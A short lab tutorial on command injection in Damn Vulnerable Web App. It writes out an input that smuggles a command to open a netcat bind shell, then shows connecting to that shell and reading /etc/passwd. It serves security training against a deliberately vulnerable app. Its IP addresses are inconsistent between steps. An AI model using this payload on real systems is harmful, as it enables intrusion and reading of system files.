Damn Vulnerable Web App (DVWA) | Command Injection Attack using NetCat

In this post we are going to cover Command Injection Attack using NetCat on Damn Vulnerable Web App.

Background:

• What is Damn Vulnerable Web App (DVWA)?
  • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
  • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
• What is Command Execution?
  • Command Execution is where a website application provides the ability to execute system commands.
• What is a Command Injection Attack?
  • The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application.
  • In situations like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it
    as an authorized system user.
  • Note, the commands are executed with the same privileges as the application and/or web server.
  • Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).
• What is a Command Injection Listener Attack?
• A Command Injection Listener Attack is where a malicious user creates a backdoor listener using common network utilities such as netcat.
• Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP.
• Unix/Linux Example: 9.9.9.9;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Lab:

1) Access DVWA application on your browser.

2) Click on Command Injection

3) Pass below data as argument in text box and lick on submit. 

192.168.43.118;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

• Make a FIFO named pipe.
• Pipes allow separate processes to communicate without having been designed explicitly to work together.
• This will allow two processes to connect to netcat.
• nc -l 4444, tells netcat to listen and allow connections on port 4444.
• 192.168.43.118 is IP address of DVWA applciation.

4) Point 3 will open a back door to access DVWA machine. 

5) Now Login to your Kali Linux machine.

6) Now Use NetCat on Kali Linux to access DVWA instance.

1. nc 192.168.43.209 4444
   • Use Kali Linux to Connect to DVWA Netcat session on port 4444
2. hostname
   • This is server hostname that hosts DVWA.
3. cat /etc/passwd
• Show content of the /etc/passwd file

Like this we can perform any operation on DVWA instance from Kali Linux as long as we have NetCat session running on DVWA machine.